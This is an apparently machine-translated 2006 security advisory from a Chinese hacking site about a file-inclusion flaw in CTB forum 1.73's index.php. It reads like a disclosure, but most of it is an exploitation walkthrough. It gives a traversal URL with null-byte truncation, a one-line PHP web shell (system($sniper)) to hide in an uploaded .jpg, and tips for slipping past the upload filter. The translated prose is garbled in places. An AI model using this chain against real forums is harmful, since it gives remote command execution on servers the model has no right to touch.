CTB arbitrary file include vulnerability-vulnerability warning-the black bar safety net

2006-10-05T00:00:00
ID MYHACK58:62200612123
Type myhack58
Reporter 佚名
Modified 2006-10-05T00:00:00

Description

Introduction

CTB(China Text Bulletin)the Forum is a free domestic text Forum. Since the code is relatively Mature and the text of the Forum of the convenient features used in the country more widely. Previously had a rough turn of the change the forum code found aXSSvulnerabilities, due to school busy will no longer be the depth of the excavations. This year the New Year, when again looked at the code to find the point significant security risks.

Affected version

CTB 1.73 bete1 Prior to this version should also be affected by this, specific version because of the limited conditions to be able to one by one test.

index. php due to the user submitted mods variable is not doing enough of the judgment and the filter result in a remote attacker can combine PHP itself vulnerability execute PHP code, and then get on the server, file operation permissions.

index. the php part of the code is as follows:

|

if (! file_exists("./ mods/".$ mods.". php")) { $mods = "main"; } require_once ("./ mods/".$ mods.". php");


The Forum of the developers is clearly for the mods of the variables did not do enough to prevent, the first judgment about whether the file exists, if file exists, then it directly contains the file, and we can be in the mods variable to add the number of../to jump to the directory, so that the program included into our PHP code and perform! Of course we might say we can control is only$mods section, followed the program will also automatically give plus one. php suffix. Obviously, in the actual remote attacker if you can directly on the server Upload a the. php file, then he wouldn't bother then to take advantage of this vulnerability:)

PHP itself has a security vulnerability exists, and just for us to use: php4. 3. 9 There is a character attack vulnerability, exploit the vulnerability, an attacker can read arbitrary files. Exist in php4. 3. 6 ~ 4.3. 9 and php5. 0. 0 ~ 5.0.2 bug, the attacker can construct the uploaded file name to across the directory permissions. Several vulnerabilities exist in both the win32 and unix versions, win32 vulnerable to!

Addslashes() vulnerability

In the Addslashes()function, the null byte is an error code, when a file via the include or require to contain the user input file, the attacker could exploit this vulnerability to read the file.

Addslashes function should be the null byte(in this article we expressed as"%0 0")is converted to"\0",in php4. 3. 9, the empty bytes are converted to"\%0 0",in the include and require instruction in all after this character will be ignored, the attacker can shorten the include function to load the file name. The last character is a backslash, on windows systems, the backslash is the directory separator. In php4. 3. 9, The backslashes in front of characters constituting the file name to be loaded. Detailed description and patch refer to the official announcement

Combined with our previous code analysis, very easily we can think we just need to combine this vulnerability in the mods variables then do the hands and feet we can achieve the purpose.

For example:

http://www.target.com/ctb/index.php?mods=../data/upfile/2_1_1118989409.jpg%00& 'forumid' =1&postid=2&p=1


We specify mods=../data/upfile/2_1_1118989409. jpg%0 0

And since php is itself a vulnerability and CTB procedures, CTB last included file will be

require_once ("./ data/upfile/2_1_1118989409.jpg");


If the jpg written inside of a php Trojan?, Hey Hey, the consequences will be how.

Here it has been very clear, using this vulnerability we can write a short php Trojan to execute the command. However the upload time note don't take some of the characters:

if (stristr($uploadFileContent, 'form') !== false or stristr($uploadFileContent, 'javascript') !== false) { unlink($uploadNewPath); $this->showMsg("upload attachments containing the system prohibits the characters, please modify the compressed or packaged after to re-upload");


Write the word Trojan on it:

< ? php system($sniper);?& gt;


Save As. jpg file, then upload, then find the upload after the path, and then use the index. php include, implementation, OK. What do you want? right, Hey, Hey, if the server to disable the system functions themselves want to approach it, not belonging to the present to ask the scope of the discussion. the php function is pretty powerful:)